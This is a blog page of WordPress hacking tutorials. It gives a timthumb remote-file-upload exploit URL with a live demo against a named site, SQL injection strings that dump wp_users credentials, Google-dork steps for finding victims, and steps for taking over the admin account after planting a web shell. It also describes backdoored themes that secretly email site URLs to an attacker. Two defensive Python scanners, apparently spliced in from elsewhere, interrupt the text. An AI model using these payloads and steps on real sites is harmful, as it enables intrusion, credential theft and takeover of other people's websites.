Showing posts with label WORDPRESS SITE HACK. Show all posts

How to hack Wordpress site?!!!

We continue our WordPress hacking tutorial series; today's title is Hacking WordPress: Send Email Secretly About Website Information. This tutorial is closely related to our last tutorial about 

As I already stated in the last WordPress hacking tutorial, "Do not think too complex about this tutorial, because we will learn this with an approach to social engineering technique".
Last time we talked about how an administrator user is added secretly when an attacker spreads malicious premium WordPress themes; now the attacker needs to know which websites already use the malicious themes.
Requirements:
1. Understand PHP,
2. Know WordPress functions,
3. Script to send email secretly (download below).

Step by step Hacking WordPress: Send Email Secretly About Website Information:


1. We want to know the WordPress user information of a user. Let's see the following script:
2. When executed, the script in step one shows the details of the active (logged-in) WordPress user. We run this script on my local WordPress server, and here are the results:
We can see from the picture above the username and password hash of the WordPress user.
3. Even though we know the username and password hash, we still need time to crack the hash to get the user's plain password.
In our last tutorial, WordPress hacking tutorials to add administrator user secretly, we could add an administrator secretly by spreading malicious themes, but the problem is: "how do we know who already downloaded the malicious wordpress themes?"
4. To solve the problem in step three, we combine this tutorial with WordPress hacking tutorials to add administrator user secretly and send the URL address of the infected website by inserting the following script.
5. Looking at this email address, it's way too plain :-) What if we encode it using the PHP base64_encode function? Here is the result.
6. The script secretly sends an email containing the WordPress URL to the attacker when the victim is logged in and browses his/her WordPress website.
Conclusion:
1. Download WordPress themes only from trusted sources.
2. Buying is better than "free download" :-D
3. This kind of attack is usually found in premium WordPress themes (nulled or warez editions); make sure you check the source code of the themes file by file to minimize the risk.
You can try searching for the strings below in your theme code (especially in nulled and warez editions) to check whether it contains malicious code:
base64_encode (most attackers use base64 encoding),
http:// (check for URLs that go somewhere),
Anyone want to add?
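
The string search suggested above, as an added Python example (not code from the original post): it walks a theme directory and reports each base64 call, each URL whose host is outside an allowlist, and each mail call. The allowlist, the mail pattern and the sample theme files are assumptions constructed for the example.

```python
import re
import tempfile
from pathlib import Path

# "base64" and "url" are the two strings the post says to look for; "mail" is an
# added assumption, since the script the post describes sends email.
PATTERNS = {
    "base64": re.compile(r"\bbase64_(?:en|de)code\s*\(", re.I),
    "url": re.compile(r"https?://[^\s'\"<>)]+", re.I),
    "mail": re.compile(r"\b(?:wp_)?mail\s*\(", re.I),
}
# Assumed allowlist of hosts a clean theme may reference; extend it for your site.
ALLOWED_HOSTS = ("wordpress.org", "w3.org", "gmpg.org")


def allowed(url):
    """True when the URL's host is an allowlisted domain or a subdomain of one."""
    host = url.split("://", 1)[1].split("/", 1)[0].split(":", 1)[0].lower()
    return any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS)


def scan_theme(theme_dir):
    """Return (file, line_no, indicator, text) for each hit in the theme's *.php files."""
    findings = []
    for path in sorted(Path(theme_dir).rglob("*.php")):
        for no, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
            for name, rx in PATTERNS.items():
                for m in rx.finditer(line):
                    if not (name == "url" and allowed(m.group(0))):
                        findings.append((path.name, no, name, line.strip()[:100]))
    return findings


def demo():
    """Scan a constructed two-file theme; each functions.php line has one indicator."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "header.php").write_text('<html xmlns="http://www.w3.org/1999/xhtml">\n')
        Path(tmp, "functions.php").write_text(
            "<?php\n"
            "$blob = base64_decode('Y29uc3RydWN0ZWQ=');\n"
            "$home = 'http://tracker.example.invalid/c.php';\n"
            "wp_mail($to, $subject, $body);\n"
        )
        return scan_theme(tmp)


if __name__ == "__main__":
    for finding in demo():
        print("%s:%d [%s] %s" % finding)
```

A hit is a line to read, not a verdict: legitimate themes also call these functions, so review each finding in context.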

Wordpress timthumb remote file upload Vulnerability

With this vulnerability you can include any file (every format is allowed) on a vulnerable WordPress website.
This bug is known as the "timthumb.php" exploit.
exploit: http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://websiteite.com/anyfile.fileformat
example: http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://www.devilscafe.in/deface.html
After accessing this URL, the file is uploaded to the website remotely.
To view your uploaded file, go to:
http://wordpresssite.com/wp-content/plugins/highlighter/libs/temp/yourfilehere
(the file is uploaded with a random name like fe0555b78d04cb3c76cff7e10cf05b77; check the last file to view your file)
live Demo : http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://pastehtml.com/view/btuwhb6nl.html
Result :http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/temp/1dc2c9907ce70a6ed472bbb1cad3cf71.html

Wordpress SQL Injection Hacks




There are millions of sites hosted on WordPress. This is a new tutorial on WordPress hacking with SQL injections; let's see.

How to use it?
For example:
1st injection is "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/* 
Now modify it into a Google dork. To make the dork, use "Inurl:injection's php or dire here"; for example, for this injection the dork will be "inurl:wp-content/plugins/st_newsletter/stnl_iframe.php".
Now go to Google.com, type your modified dork and see the search results. For this dork a search result will look like http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter= Remove the words after iframe.php and put your SQL injection there ...
Now the URL will be http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users-- You will get the username and MD5-coded password ...
Crack the password using MD5 decoding tools and log in here: http://site.com/wp-login.php
Note: The process is the same for all injections.
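
Seen from the server side, both the timthumb request and the injection requests described above leave recognisable entries in the web server's access log. An added Python example (not from the original posts) that flags them; the log format, the site host `blog.example.test` and the label names are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Request part of a combined-format log line, and UNION..SELECT..wp_users after decoding.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQLI = re.compile(r"\bunion\b.+\bselect\b.+\bwp_users\b", re.I | re.S)

# Constructed request targets; the injection strings are those quoted in the post
# (the second one shortened), the hosts are placeholders.
TT = "/wp-content/plugins/highlighter/libs/timthumb.php"
SAMPLE_TARGETS = [
    TT + "?src=http://files.example.invalid/a.html",
    TT + "?src=http://blog.example.test/wp-content/uploads/a.jpg",
    "/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+"
    "concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",
    "/index.php?cat=999%20UNION%20SELECT%20null,null%20FROM%20wp_users/*",
    "/index.php?cat=12",
]
LOG_FMT = '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET %s HTTP/1.1" 200 512'
SAMPLE_LOG = [LOG_FMT % t for t in SAMPLE_TARGETS]


def classify(log_line, site_host):
    """Return the set of labels for one access-log line (empty set = nothing found)."""
    m = REQUEST.search(log_line)
    if not m:
        return set()
    labels = set()
    try:
        target = urlsplit(m.group(1))
        if target.path.lower().endswith("/timthumb.php"):
            for src in parse_qs(target.query).get("src", []):
                host = (urlsplit(src).hostname or "").lower()
                if host and host != site_host and not host.endswith("." + site_host):
                    labels.add("timthumb-remote-src")
    except ValueError:
        labels.add("unparseable-url")
    if SQLI.search(unquote_plus(m.group(1))):
        labels.add("sqli-wp_users")
    return labels


def scan(log_lines, site_host):
    """Return [(line_no, sorted labels)] for every line that got a label."""
    pairs = ((no, classify(line, site_host)) for no, line in enumerate(log_lines, 1))
    return [(no, sorted(labels)) for no, labels in pairs if labels]


if __name__ == "__main__":
    print(scan(SAMPLE_LOG, "blog.example.test"))
```

Matches are triage leads only, since alternative encodings can slip past a regex; the lasting fix is to update or remove the affected plugin.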

How To Gain Admin access on WordPress websites after uploading shell



If you want access to the same site where you uploaded the shell, simply edit wp-config.php


Copy the MySQL database's username and password from wp-config.php.
Now go to the MySQL option in the b374k shell
and paste the username and password there.


Now click on Go.
Now you will get 2 tables there;
click on the table below information_schema.


Click on the second table and find wp_users there,
and click on wp_users.


You'll get the admin username, password and email there,
but it's hard to crack a WordPress password, so we need to reset it with our own hash!
Simply put the password reset query in the black box:
UPDATE wp_users SET user_pass =md5( '123456') WHERE user_login = 'admin';
and click on Go.
You'll get a reply:
UPDATE wp_users SET user_pass =md5( '123456') WHERE user_login = 'admin'; [ok]
It means the password was changed successfully!


Now go to http://www.site.com/wp-admin and log in there =)
